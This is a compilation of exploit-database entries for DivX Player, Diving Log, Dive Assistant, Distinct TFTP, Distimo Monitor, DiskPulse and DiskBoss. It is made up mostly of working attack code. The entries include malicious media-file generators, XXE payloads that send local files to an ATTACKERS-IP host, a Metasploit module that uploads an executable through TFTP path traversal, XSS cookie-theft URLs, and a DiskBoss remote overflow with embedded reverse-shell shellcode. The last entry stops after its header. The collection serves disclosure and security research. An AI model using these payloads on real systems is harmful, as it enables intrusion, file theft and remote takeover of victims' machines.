# Author : KedAns-Dz
# E-mail : ked-h@hotmail.com
# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
# Twitter page : twitter.com/kedans
# platform : Windows
# Impact : Overflow in 'DivX Player.exe' Process
# Tested on : Windows XP SP3 Fran.ais
# Target : DivX Player v6.8 & 6.9 & 7.0
###
# Note : BAC 2011 Enchallah ( KedAns 'me' & BadR0 & Dr.Ride & Red1One & XoreR & Fox-Dz ... all )
# ------------
# Usage : 1 - Creat MID file
# => 2 - Open MID file With DivX Player
# => 3 - OverFlow !!!
# ------------
# Homologue Bug in MP_Classic: (http://exploit-db.com/exploits/9620) || By : PLATEN
# ------------
# Assembly Error in [quartz.dll] ! 74872224() ! :
# 0x74872221 ,0x83 0xd2 0x00 || [adc] edx,0
# 0x74872224 ,0xf7 0xf1 [div] || eax,acx << (" Error Here ")
# 0x74872226 ,0x0f 0xa4 0xc2 0x10 [shld] || edx,eax,10h
# ------------
#START SYSTEM /root@MSdos/ :
system("title KedAns-Dz");
system("color 1e");
system("cls");
print "\n\n";
print " |===========================================|\n";
print " |= [!] Name : DivX Player v6 & 7.0 (.mid) =|\n";
print " |= [!] Exploit : Buffer Overflow Exploit =|\n";
print " |= [!] Author : KedAns-Dz =|\n";
print " |= [!] Mail: Ked-h(at)hotmail(dot)com =|\n";
print " |===========================================|\n";
sleep(2);
print "\n";
# Creating ...
my $PoC = # MID Header
"\x4d\x54\x68\x64\x00\x00\x00\x06\x00\x01\x00\x01\x00\x60\x4d\x54".
"\x72\x6b\x00\x00\x00\x4e\x00\xff\x03\x08\x34\x31\x33\x61\x34\x61".
"\x35\x30\x00\x91\x41\x60\x01\x3a\x60\x01\x4a\x60\x01\x50\x60\x7d".
"\x81\x41\x01\x01\x3a\x5f\x8d\xe4\xa0\x01\x50\x01\x3d\x91\x41\x60".
"\x81\x00\x81\x41\x40\x00\x91\x3a\x60\x81\x00\x76\x6f\xcc\x3d\xa6".
"\xc2\x48\xee\x8e\xca\xc2\x57\x00\x91\x50\x60\x81\x00\x81\x50\x40".
"\x00\xff\x2f\x00";
open(file , ">", "Kedans.mid"); # Evil File MID (100 bytes) 4.0 KB
print file $PoC;
print "\n [+] File successfully created!\n" or die print "\n [-] OpsS! File is Not Created !! ";
close(file);
# Thanks To : ' PLATEN ' & All Iranian MusLim HacKers
#================[ Exploited By KedAns-Dz * HST-Dz * ]===========================================
# Greets To : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS >
# Islampard * Zaki.Eng * Dr.Ride * Red1One * Badr0 * XoreR * Nor0 FouinY * Hani * Mr.Dak007 * Fox-Dz
# Masimovic * TOnyXED * cr4wl3r (Inj3ct0r.com) * TeX (hotturks.org) * KelvinX (kelvinx.net) * Dos-Dz
# Nayla Festa * all (sec4ever.com) Members * PLATEN (Pentesters.ir) * Gamoscu (www.1923turk.com)
# Greets to All ALGERIANS EXPLO!TER's & DEVELOPER's :=> {{
# Indoushka (Inj3ct0r.com) * [ Ma3sTr0-Dz * MadjiX * BrOx-Dz * JaGo-Dz (sec4ever.com) ] * Dr.0rYX
# Cr3w-DZ * His0k4 * El-Kahina * Dz-Girl * SuNHouSe2 ; All Others && All My Friends . }} ,
# www.packetstormsecurity.org * exploit-db.com * bugsearch.net * 1337day.com * x000.com
# www.metasploit.com * www.securityreason.com * All Security and Exploits Webs ...
#================================================================================================
source: https://www.securityfocus.com/bid/55105/info
Divx Player is prone to a denial-of-service vulnerability.
An attacker can exploit this issue to cause the application to crash, denying service to legitimate users.
Divx 6.8.2 is vulnerable; other versions may also be affected.
# usage : perl divxdOs.pl
my $id="\x55\x46\x49\x44\x20\x55\x6e\x69\x71\x75\x65\x20\x66\x69\x6c\x65\x20\x69\x64\x65\x6e\x74\x69\x66\x69\x65\x72\x0d\x0a\x55\x53\x45\x52\x20\x54\x65\x72\x6d\x73\x20\x6f\x66\x20\x75\x73\x65\x0d\x0a\x55\x53\x4c\x54\x20\x55\x6e\x73\x79\x6e\x63\x68\x72\x6f\x6e\x69\x7a\x65\x64\x20\x6c\x79\x72\x69\x63\x2f\x74\x65\x78\x74\x20\x74\x72\x61\x6e\x73\x63\x72\x69\x70\x74\x69\x6f\x6e";
my $cdat= "\x0c\x0b\x0b\x0c\x19\x12\x13\x0f\x14\x1d\x1a\x1f\x1e\x1d\x1a\x1c\x1c\x20\x24\x2e\x27\x20\x22\x2c\x23\x1c\x1c\x28\x2b\x78\x29\x2c\x30\x27\x39\x3d\x30\x3c\x2e\x61\x78\x32\xc3\x83\xc2\xbf\xc3\x83\xef\xbf\xbd";
my $file= "dark-puzzle.mp3";
open($FILE,">$file");
print $FILE $id.$cdat;
close($FILE);
print "MP3 File Created , Enjoy !!\n";
[+] Exploit Title: Diving Log 6.0 XXE Injection
[+] Date: 27-11-2017
[+] Exploit Author: Trent Gordon
[+] Vendor Homepage: http://www.divinglog.de
[+] Software Link: http://www.divinglog.de/english/download/
[+] Disclosed at: https://thenopsled.com/divinglog.txt
[+] Version: 6.0
[+] Tested on: Windows 7 SP1, Windows 10
[+] CVE: CVE-2017-9095
==================
Background:
==================
Diving Log 6.0 is a scuba diving log software that manages and consolidates logs from other disparate sources. Many scuba diving log software programs export their data in an XML file.
==================
Vulnerability:
==================
By having a user import a crafted dive.xml file (very common, many divers share logs), it is possible to execute a XXE injection which retrieves local files and exfiltrates them to a remote attacker.
1.)Open Diving Log 6.0
2.)Close "Welcome Center" popup and select "Import" from the bottom left corner
3.)Select "Subsurface" from the list of import data types.
4.)"Open File" and select the crafted dive.xml file (with listener open on ATTACKERS-IP)
==================
Proof of Concept:
==================
a.) python -m SimpleHTTPServer 9999 (listening on ATTACKERS-IP and hosting payload.dtd)
b.) Hosted "payload.dtd"
<?xml version="1.0" encoding="utf-8" ?>
<!ENTITY % data SYSTEM "file:///c:/windows/system.ini">
<!ENTITY % param1 "<!ENTITY % exfil SYSTEM 'http://ATTACKERS-IP?%data;'>">
c.) Exploited "dive.xml"
<?xml version="1.0"?>
<!DOCTYPE data [
<!ENTITY % sp SYSTEM "http://ATTACKERS-IP/payload.dtd">
%sp;
%param1;
%exfil;
]>
<divelog program='subsurface' version='3'>
<settings>
</settings>
<divesites>
<site uuid='33a32a07' name='hacked'>
</site>
</divesites>
<dives>
<dive number='1' divesiteid='33a32a07' date='2017-05-15' time='14:49:10' duration='46:00 min'>
<notes></notes>
<cylinder size='11.1 l' workpressure='207.0 bar' description='unknown' />
<divecomputer model='manually added dive'>
<depth max='15.0 m' mean='13.37 m' />
<surface pressure='1.013 bar' />
<sample time='0:00 min' depth='0.0 m' />
<sample time='3:00 min' depth='15.0 m' />
<sample time='40:00 min' depth='15.0 m' />
<sample time='42:00 min' depth='5.0 m' />
<sample time='45:00 min' depth='5.0 m' />
<sample time='46:00 min' depth='0.0 m' />
</divecomputer>
</dive>
</dives>
</divelog>
==================
Additional Attack Vectors:
==================
I tested and exploited the "subsurface" import option, however MANY other dive log software programs use XML and most are available as Import options in Diving Log 6.0. This XXE injection vulnerability is most likely vulnerable in every import option that utilizes XML for the underlying custom file format(.UDCF and .UDDF, for example).
DivFix++ denial of service vulnerability
================
Author : qflb.wu
===============
Introduction:
=============
DivFix++ is FREE AVI Video Fix & Preview program.
Affected version:
=====
v0.34
Vulnerability Description:
==========================
the DivFixppCore::avi_header_fix function in src/DivFix++Core.cpp in DivFix++ v0.34 can cause a denial of service(invalid memory write and application crash) via a crafted avi file.
./DivFix++ -i DivFix++_v0.34_invalid_memory_write.avi -o out.avi
----debug info:----
Program received signal SIGSEGV, Segmentation fault.
__memcpy_sse2_unaligned ()
at ../sysdeps/x86_64/multiarch/memcpy-sse2-unaligned.S:167
167../sysdeps/x86_64/multiarch/memcpy-sse2-unaligned.S: No such file or directory.
(gdb) bt
#0 __memcpy_sse2_unaligned ()
at ../sysdeps/x86_64/multiarch/memcpy-sse2-unaligned.S:167
#1 0x00000000004239d8 in DivFixppCore::avi_header_fix() ()
#2 0x000000000042c0c0 in DivFixppCore::Fix(wxString, wxString, bool, bool, bool, bool) ()
#3 0x000000000041404a in DivFixppApp::OnCmdLineParsed(wxCmdLineParser&) ()
#4 0x0000000000414f6e in DivFixppApp::OnInit() ()
#5 0x0000000000416f4f in wxAppConsoleBase::CallOnInit() ()
#6 0x00007ffff6c6903c in wxEntry(int&, wchar_t**) ()
from /usr/lib/x86_64-linux-gnu/libwx_baseu-3.0.so.0
#7 0x0000000000411e70 in main ()
(gdb)
-------------------
(gdb) disassemble 0x00000000004239b0,0x00000000004239df
Dump of assembler code from 0x4239b0 to 0x4239df:
0x00000000004239b0 <_ZN12DivFixppCore14avi_header_fixEv+3504>:add %al,(%rax)
0x00000000004239b2 <_ZN12DivFixppCore14avi_header_fixEv+3506>:mov %eax,%edi
0x00000000004239b4 <_ZN12DivFixppCore14avi_header_fixEv+3508>:callq 0x434eaf <_Z17make_littleendianIiERT_S0_>
0x00000000004239b9 <_ZN12DivFixppCore14avi_header_fixEv+3513>:mov -0x138(%rbp),%rdx
0x00000000004239c0 <_ZN12DivFixppCore14avi_header_fixEv+3520>:mov 0x38(%rdx),%rdx
0x00000000004239c4 <_ZN12DivFixppCore14avi_header_fixEv+3524>:lea 0x10(%rdx),%rcx
0x00000000004239c8 <_ZN12DivFixppCore14avi_header_fixEv+3528>:mov $0x4,%edx
0x00000000004239cd <_ZN12DivFixppCore14avi_header_fixEv+3533>:mov %rax,%rsi
0x00000000004239d0 <_ZN12DivFixppCore14avi_header_fixEv+3536>:mov %rcx,%rdi
=> 0x00000000004239d3 <_ZN12DivFixppCore14avi_header_fixEv+3539>:callq 0x40fcc0 <memcpy@plt>
0x00000000004239d8 <_ZN12DivFixppCore14avi_header_fixEv+3544>:mov -0x138(%rbp),%rax
---Type <return> to continue, or q <return> to quit---
End of assembler dump.
(gdb) i r
rax 0x6615286690088
rbx 0x00
rcx 0x1016
rdx 0x44
rsi 0x6615286690088
rdi 0x1016
rbp 0x7fffffffcf100x7fffffffcf10
rsp 0x7fffffffcdd00x7fffffffcdd0
r8 0x8049308407344
r9 0x7ffff7fc1a40140737353882176
r10 0x640000006e429496729710
r11 0x00
r12 0x11
r13 0x11
r14 0x00
r15 0x00
rip 0x4239d30x4239d3 <DivFixppCore::avi_header_fix()+3539>
eflags 0x246[ PF ZF IF ]
cs 0x3351
ss 0x2b43
ds 0x00
es 0x00
fs 0x00
---Type <return> to continue, or q <return> to quit---
gs 0x00
(gdb)
POC:
DivFix++_v0.34_invalid_memory_write.avi
CVE:
CVE-2017-11330
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42396.zip
[+] Exploit Title: Dive Assistant - Template Builder XXE Injection
[+] Date: 12-05-2017
[+] Exploit Author: Trent Gordon
[+] Vendor Homepage: http://www.blackwave.com/
[+] Software Link: http://www.diveassistant.com/Products/DiveAssistantDesktop/index.aspx
[+] Version: 8.0
[+] Tested on: Windows 7 SP1, Windows 10
[+] CVE: CVE-2017-8918
1. Vulnerability Description
Dive Assistant - Desktop Edition comes with a template builder .exe to create print templates. The templates are saved and uploaded as XML files which are vulnerable to XXE injection. Sending a crafted payload to a user, when opened in Dive Assistant - Template Builder, will return the content of any local files to a remote attacker.
2. Proof of Concept
a.) python -m SimpleHTTPServer 9999 (listening on attacker's IP and hosting payload.dtd)
b.) Hosted "payload.dtd"
<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://ATTACKER-IP:9999?%file;'>">
%all;
c.) Exploited "template.xml"
<?xml version="1.0"?
<!DOCTYPE exploit [
<!ENTITY % file SYSTEM "C:\Windows\System.ini">
<!ENTITY % dtd SYSTEM "http://ATTACKER-IP:9999?%file;'>">
%dtd;]>
<exploit>&send;</exploit>
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Rex::Proto::TFTP
include Msf::Exploit::EXE
include Msf::Exploit::WbemExec
def initialize(info={})
super(update_info(info,
'Name' => "Distinct TFTP 3.10 Writable Directory Traversal Execution",
'Description' => %q{
This module exploits a vulnerability found in Distinct TFTP server. The
software contains a directory traversal vulnerability that allows a remote
attacker to write arbitrary file to the file system, which results in
code execution under the context of 'SYSTEM'.
},
'License' => MSF_LICENSE,
'Author' =>
[
'modpr0be', #Initial discovery, PoC (Tom Gregory)
'sinn3r' #Metasploit
],
'References' =>
[
['OSVDB', '80984'],
['EDB', '18718'],
['URL', 'http://www.spentera.com/advisories/2012/SPN-01-2012.pdf'],
['CVE', '2012-6664']
],
'Payload' =>
{
'BadChars' => "\x00",
},
'DefaultOptions' =>
{
'EXITFUNC' => 'thread'
},
'Platform' => 'win',
'Targets' =>
[
['Distinct TFTP 3.10 on Windows', {}]
],
'Privileged' => false,
'DisclosureDate' => "Apr 8 2012",
'DefaultTarget' => 0))
register_options([
OptInt.new('DEPTH', [false, "Levels to reach base directory",10]),
OptAddress.new('RHOST', [true, "The remote TFTP server address"]),
OptPort.new('RPORT', [true, "The remote TFTP server port", 69])
], self.class)
end
def upload(filename, data)
tftp_client = Rex::Proto::TFTP::Client.new(
"LocalHost" => "0.0.0.0",
"LocalPort" => 1025 + rand(0xffff-1025),
"PeerHost" => datastore['RHOST'],
"PeerPort" => datastore['RPORT'],
"LocalFile" => "DATA:#{data}",
"RemoteFile" => filename,
"Mode" => "octet",
"Context" => {'Msf' => self.framework, "MsfExploit" => self },
"Action" => :upload
)
ret = tftp_client.send_write_request { |msg| print_status(msg) }
while not tftp_client.complete
select(nil, nil, nil, 1)
tftp_client.stop
end
end
def exploit
peer = "#{datastore['RHOST']}:#{datastore['RPORT']}"
# Setup the necessary files to do the wbemexec trick
exe_name = rand_text_alpha(rand(10)+5) + '.exe'
exe = generate_payload_exe
mof_name = rand_text_alpha(rand(10)+5) + '.mof'
mof = generate_mof(mof_name, exe_name)
# Configure how deep we want to traverse
depth = (datastore['DEPTH'].nil? or datastore['DEPTH'] == 0) ? 10 : datastore['DEPTH']
levels = "../" * depth
# Upload the malicious executable to C:\Windows\System32\
print_status("#{peer} - Uploading executable (#{exe.length.to_s} bytes)")
upload("#{levels}WINDOWS\\system32\\#{exe_name}", exe)
# Let the TFTP server idle a bit before sending another file
select(nil, nil, nil, 1)
# Upload the mof file
print_status("#{peer} - Uploading .mof...")
upload("#{levels}WINDOWS\\system32\\wbem\\mof\\#{mof_name}", mof)
end
end
source: https://www.securityfocus.com/bid/54757/info
Distimo Monitor is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Distimo Monitor 6.0 is vulnerable; other versions may also be affected.
https://www.example.com/downloads/date/metric:1/country:29/application:%22%3E%3Ciframe%20src=a%20onload=alert%28document.cookie%29%20%3C/appstore:1
https://www.example.com/downloads/date/metric:1/country:%22%3E%3Ciframe%20src=a%20onload=alert%28document.cookie%29%20%3C/application:99/appstore:1
https://www.example.com/downloads/map/metric:%3E%22%3Ciframe%20src=http://www.example1.com%3E+%3E%22%3Ciframe%20src=http://www.example1.com%3E
https://www.example.com/revenue/date/application:99/country:%3E%22%3Ciframe%20src=http://www.example1.com%3E%3E%22%3Ciframe%20src=http://www.example1.com%3E
https://www.example.com/revenue/date/application:%3E%22%3Ciframe%20src=http://www.example1.com%3E%3E%22%3Ciframe%20src=http://www.example1.com/country:30
# Exploit Title: DiskPulse 13.6.14 - 'Multiple' Unquoted Service Path
# Discovery by: Brian Rodriguez
# Date: 14-06-2021
# Vendor Homepage: https://www.diskpulse.com
# Software Links:
# https://www.diskpulse.com/setups_x64/diskpulseent_setup_v13.6.14_x64.exe
# https://www.diskpulse.com/setups_x64/diskpulsesrv_setup_v13.6.14_x64.exe
# Tested Version: 13.6.14
# Vulnerability Type: Unquoted Service Path
# Tested on: Windows 10 Enterprise 64 bits
# Step to discover Unquoted Service Path:
C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto"
|findstr /i /v "c:\windows\\" |findstr /i /v """
Disk Pulse Enterprise Disk Pulse Enterprise C:\Program Files\Disk Pulse
Enterprise\bin\diskpls.exe Auto
Disk Pulse Server Disk Pulse Server C:\Program Files\Disk Pulse
Server\bin\diskpls.exe Auto
C:\Users\IEUser>sc qc "Disk Pulse Enterprise"
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: Disk Pulse Enterprise
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 0 IGNORE
NOMBRE_RUTA_BINARIO: C:\Program Files\Disk Pulse
Enterprise\bin\diskpls.exe
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : Disk Pulse Enterprise
DEPENDENCIAS :
NOMBRE_INICIO_SERVICIO: LocalSystem
C:\Users\IEUser>sc qc "Disk Pulse Server"
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: Disk Pulse Server
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 0 IGNORE
NOMBRE_RUTA_BINARIO: C:\Program Files\Disk Pulse
Server\bin\diskpls.exe
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : Disk Pulse Server
DEPENDENCIAS :
NOMBRE_INICIO_SERVICIO: LocalSystem
# Exploit Title: DiskBoss v11.7.28 - Multiple Services Unquoted Service Path
# Date: 2020-8-20
# Exploit Author: Mohammed Alshehri
# Vendor Homepage: https://www.diskboss.com/
# Software Link: https://www.diskboss.com/downloads.html
# Version: v11.7.28
# Tested on: Microsoft Windows Server 2019 Standard 10.0.17763 N/A Build 17763
# Product | Version
# DiskBoss v11.7.28
# DiskBoss Pro v11.7.28
# DiskBoss Ultimate v11.7.28
# DiskBoss Server v11.7.28
# DiskBoss Enterprise v11.7.28
# All the listed products are vulnerable to Unquoted Service path. Any low privileged user can elevate their privileges using any of these services.
# Services info:
C:\Users\m507>sc qc "DiskBoss Service"
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: DiskBoss Service
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 0 IGNORE
BINARY_PATH_NAME : C:\Program Files\DiskBoss\bin\diskbsa.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : DiskBoss Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\Users\m507>
C:\Users\m507>sc qc "DiskBoss Enterprise"
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: DiskBoss Enterprise
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 0 IGNORE
BINARY_PATH_NAME : C:\Program Files (x86)\DiskBoss Enterprise\bin\diskbss.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : DiskBoss Enterprise
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\Users\m507>
C:\Users\m507>sc qc "DiskBoss Ultimate Service"
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: DiskBoss Ultimate Service
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 0 IGNORE
BINARY_PATH_NAME : C:\Program Files (x86)\DiskBoss Ultimate\bin\diskbsa.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : DiskBoss Ultimate Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\Users\m507>
C:\Users\m507>sc qc "DiskBoss Server"
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: DiskBoss Server
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 0 IGNORE
BINARY_PATH_NAME : C:\Program Files (x86)\DiskBoss Server\bin\diskbss.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : DiskBoss Server
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\Users\m507>
C:\Users\m507>sc qc "DiskBoss Pro Service"
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: DiskBoss Pro Service
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 0 IGNORE
BINARY_PATH_NAME : C:\Program Files (x86)\DiskBoss Pro\bin\diskbsa.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : DiskBoss Pro Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\Users\m507>
# Exploit:
This vulnerability could permit executing code during startup or reboot with the escalated privileges.
# Exploit Title: DiskBoss Service 12.2.18 - 'diskbsa.exe' Unquoted Service Path
# Discovery by: Erick Galindo
# Discovery Date: 2021-05-21
# Vendor Homepage: https://www.diskboss.com
# Software : https://www.diskboss.com/setups_x64/diskboss_setup_v12.2.18_x64.exe
# Tested Version: 12.2.18
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 Pro x64 es
# Step to discover Unquoted Service Path:
C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "DiskBoss" | findstr /i /v """
DiskBoss Service DiskBoss Service C:\Program Files\DiskBoss\bin\diskbsa.exe Auto
# Service info
C:\>sc qc "DiskBoss Service"
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: DiskBoss Service
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 0 IGNORE
NOMBRE_RUTA_BINARIO: C:\Program Files\DiskBoss\bin\diskbsa.exe
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : DiskBoss Service
DEPENDENCIAS :
NOMBRE_INICIO_SERVICIO: LocalSystem
#Exploit:
This vulnerability could permit executing code during startup or reboot with the escalated privileges.
# Exploit Title: DiskBoss <= 8.8.16 - Unauthenticated Remote Code Execution
# Date: 2017-08-27
# Exploit Author: Arris Huijgen
# Vendor Homepage: http://www.diskboss.com/
# Software Link: http://www.diskboss.com/setups/diskbossent_setup_v8.8.16.exe
# Version: Through 8.8.16
# Tested on: Windows 7 SP1 x64, Windows XP SP3 x86
# CVE: CVE-2018-5262
# Usage
# 1. Update the Target section
# 2. Update the shellcode
# 3. Launch!
import socket
from struct import pack
# Software editions (port, offset)
free8416 = (8096, 0x10036e9a) # ADD ESP,8 | RET 0x04 @ libdbs.dll
pro8416 = (8097, 0x10036e9a) # ADD ESP,8 | RET 0x04 @ libdbs.dll
ult8416 = (8098, 0x10036e9a) # ADD ESP,8 | RET 0x04 @ libdbs.dll
srv8416 = (8094, 0x1001806e) # ADD ESP,8 | RET 0x04 @ libpal.dll
ent8416 = (8094, 0x1001806e) # ADD ESP,8 | RET 0x04 @ libpal.dll
ent8512 = (8094, 0x100180ee) # ADD ESP,8 | RET 0x04 @ libpal.dll
free8816 = (8096, 0x10037f6a) # ADD ESP,8 | RET 0x04 @ libdbs.dll
pro8816 = (8097, 0x10037f6a) # ADD ESP,8 | RET 0x04 @ libdbs.dll
ult8816 = (8098, 0x10037f6a) # ADD ESP,8 | RET 0x04 @ libdbs.dll
srv8816 = (8094, 0x100180f9) # ADD ESP,8 | RET 0x04 @ libpal.dll
ent8816 = (8094, 0x100180f9) # ADD ESP,8 | RET 0x04 @ libpal.dll
# Target
host = '127.0.0.1'
(port, addr) = ent8816
def main():
# Connect
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
print '[+] Connected to %s:%d' % (host, port)
# Memory
size = 1000
offset = 128
# Payload
preret = '\xEB\x06\x90\x90' # JMP 0x06
ret = pack('<I', addr) # Depending on the software edition
pivot = '\xe9\x3f\xfb\xff\xff' # JMP -0x4BC
# msfvenom -a x86 --platform windows -p windows/shell_reverse_tcp LHOST=127.0.0.1 LPORT=1234 EXITFUNC=thread -f c -e x86/shikata_ga_nai -b '\x00'
# Payload size: 351 bytes
sc = (
"\xb8\x80\xac\x48\x8f\xd9\xc4\xd9\x74\x24\xf4\x5d\x2b\xc9\xb1"
"\x52\x31\x45\x12\x03\x45\x12\x83\x45\xa8\xaa\x7a\xb9\x59\xa8"
"\x85\x41\x9a\xcd\x0c\xa4\xab\xcd\x6b\xad\x9c\xfd\xf8\xe3\x10"
"\x75\xac\x17\xa2\xfb\x79\x18\x03\xb1\x5f\x17\x94\xea\x9c\x36"
"\x16\xf1\xf0\x98\x27\x3a\x05\xd9\x60\x27\xe4\x8b\x39\x23\x5b"
"\x3b\x4d\x79\x60\xb0\x1d\x6f\xe0\x25\xd5\x8e\xc1\xf8\x6d\xc9"
"\xc1\xfb\xa2\x61\x48\xe3\xa7\x4c\x02\x98\x1c\x3a\x95\x48\x6d"
"\xc3\x3a\xb5\x41\x36\x42\xf2\x66\xa9\x31\x0a\x95\x54\x42\xc9"
"\xe7\x82\xc7\xc9\x40\x40\x7f\x35\x70\x85\xe6\xbe\x7e\x62\x6c"
"\x98\x62\x75\xa1\x93\x9f\xfe\x44\x73\x16\x44\x63\x57\x72\x1e"
"\x0a\xce\xde\xf1\x33\x10\x81\xae\x91\x5b\x2c\xba\xab\x06\x39"
"\x0f\x86\xb8\xb9\x07\x91\xcb\x8b\x88\x09\x43\xa0\x41\x94\x94"
"\xc7\x7b\x60\x0a\x36\x84\x91\x03\xfd\xd0\xc1\x3b\xd4\x58\x8a"
"\xbb\xd9\x8c\x1d\xeb\x75\x7f\xde\x5b\x36\x2f\xb6\xb1\xb9\x10"
"\xa6\xba\x13\x39\x4d\x41\xf4\x39\x92\x49\x05\xae\x90\x49\x01"
"\xfc\x1c\xaf\x63\x10\x49\x78\x1c\x89\xd0\xf2\xbd\x56\xcf\x7f"
"\xfd\xdd\xfc\x80\xb0\x15\x88\x92\x25\xd6\xc7\xc8\xe0\xe9\xfd"
"\x64\x6e\x7b\x9a\x74\xf9\x60\x35\x23\xae\x57\x4c\xa1\x42\xc1"
"\xe6\xd7\x9e\x97\xc1\x53\x45\x64\xcf\x5a\x08\xd0\xeb\x4c\xd4"
"\xd9\xb7\x38\x88\x8f\x61\x96\x6e\x66\xc0\x40\x39\xd5\x8a\x04"
"\xbc\x15\x0d\x52\xc1\x73\xfb\xba\x70\x2a\xba\xc5\xbd\xba\x4a"
"\xbe\xa3\x5a\xb4\x15\x60\x7a\x57\xbf\x9d\x13\xce\x2a\x1c\x7e"
"\xf1\x81\x63\x87\x72\x23\x1c\x7c\x6a\x46\x19\x38\x2c\xbb\x53"
"\x51\xd9\xbb\xc0\x52\xc8"
)
# Compile payload
fill = 'A' * (offset - len(preret))
code = fill + preret + ret + pivot
nops = '\x90' * (size - len(code) - len(sc) - 100)
payload = code + nops + sc + 'C' * 100
# Compile message
msg = (
'\x75\x19\xba\xab' +
'\x03\x00\x00\x00' +
'\x00\x40\x00\x00' +
pack('<I', len(payload)) +
pack('<I', len(payload)) +
pack('<I', ord(payload[-1])) +
payload
)
# Send message
s.send(msg)
print '[+] Exploit sent!'
if __name__ == '__main__':
main()
# Exploit Title: DiskBoss Enterprise Server 8.5.12 - Denial of Service
# Date: 2017-10-20
# Exploit Author: Ahmad Mahfouz
# Software Link: http:///www.diskboss.com/setups/diskbosssrv_setup_v8.5.12.exe
# Version: v10.1.16
# Category; Windows Remote DOS
# CVE: CVE-2017-15665
# Author Homepage: www.unixawy.com
# Description: DiskBoss Enterprise Server 8.5.12 the Control Protocol suffers from a denial of service. The attack vector is a crafted SERVER_GET_INFO packet sent to control port 8094.
#!/usr/bin/env python
import socket
target = "192.168.72.133"
port = 8094
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((target,port))
packet = "\x75\x19\xba\xab\x03"
packet +="\x00\x00\x00\x01\x00\x00\x00\x1a"
packet += "\x00"
packet += "\x3e"
packet += "\x00"
packet += "\x20"
packet += "\x00"
packet += "\x00"
packet += "\x00"
packet += "\x00\x00\x00\x00"
packet += "SERVER_GET_INFO"
packet += "\x02\x32\x01"
packet += "Data"
packet += "\x01\x30\x01\x00"
packet += "\x04\x02\x74"
packet += "\x18\x18\x00"
s.send(packet)
try:
data = s.recv(100)
except:
print "K1LL3D"
#!/usr/bin/python
#========================================================================================================================
# Exploit Author: Touhid M.Shaikh
# Exploit Title: DiskBoss Enterprise v8.4.16 Local Buffer Overflow(PoC)
# Date: 28-09-2017
# Website: www.touhidshaikh.com
# Vulnerable Software: DiskBoss Enterprise v8.4.16
# Vendor Homepage: http://www.diskboss.com
# Version: v8.4.16
# Software Link: http://www.diskboss.com/downloads.html
# Tested On: Windows 7 x86
#
#
# To reproduce the exploit:
# 1. Click Server
# 2. Click Connect
# 3. In the "Share Name" field, paste the content of buffer.txt , And try
to connect.........BOOoom....
#
#========================================================================================================================
junk = "A"*1312
EIP = "B"*4 #EIP overwritten
b = junk+EIP+"D"*500
f = open('buffer.txt','w')
f.write(b)
f.close()
#!/usr/bin/python
#========================================================================================================================
# Exploit Author: C4t0ps1s
# Exploit Title: DiskBoss Enterprise v8.4.16 Local Buffer Overflow(Code execution)
# Date: 03-10-2017
# Twitter: @C4t0ps1s
# Email: C4t0ps1s@gmail.com
# Vulnerable Software: DiskBoss Enterprise v8.4.16
# Vendor Homepage: http://www.diskboss.com
# Version: v8.4.16
# Software Link: http://www.diskboss.com/downloads.html
# Tested On: Windows 10 x64
#
# Code execution from the PoC of Touhid M.Shaikh: https://www.exploit-db.com/exploits/42917/
#
# To reproduce the code execution:
# 1. Click Server
# 2. Click Connect
# 3. In the "Share Name" field, paste the content of shareName.txt , And try to connect
#
